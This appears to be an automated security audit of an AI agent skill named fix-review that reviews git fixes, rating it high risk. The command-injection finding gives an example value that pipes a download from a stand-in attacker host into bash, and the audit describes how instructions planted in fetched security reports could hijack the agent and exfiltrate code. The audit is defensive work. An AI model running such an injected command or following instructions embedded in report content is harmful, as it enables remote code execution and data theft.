skills/trailofbits/skills/fix-review/Gen Agent Trust Hub

fix-review

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH (COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION)
Full Analysis
  • COMMAND_EXECUTION (HIGH): Multiple files (SKILL.md, bug-detection.md, finding-matching.md) use the Bash tool to execute git commands where user-provided inputs like <source> and <target> commit hashes are directly interpolated. For example, git log <source>..<target> is susceptible to shell command injection (e.g., passing head; curl http://attacker.com | bash; # as a commit reference).
  • EXTERNAL_DOWNLOADS (MEDIUM): The references/report-parsing.md file recommends installing the gdrive CLI via brew and provides shell scripts to download files from Google Drive using this external tool. This encourages the execution of unverified external binaries and interaction with external cloud storage.
  • PROMPT_INJECTION (LOW): The skill has a significant indirect prompt injection surface. It ingests untrusted data from external URLs (WebFetch) and local security reports.
    • Ingestion points: SKILL.md (Phase 2) and references/report-parsing.md utilize WebFetch and Read tools on external reports.
    • Boundary markers: Absent; there are no instructions to the agent to treat report content as data rather than instructions.
    • Capability inventory: The agent has access to Bash, Write, and WebFetch tools, which could be abused if an attacker embeds malicious instructions in a security report.
    • Sanitization: Absent; the skill does not perform any escaping or validation of the ingested report content before processing.
  • DATA_EXFILTRATION (LOW): While the skill's primary purpose is local analysis, the combination of WebFetch and the ability to read sensitive git commit data creates a risk that a malicious report could trick the agent into exfiltrating code snippets to an external URL.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 04:40 PM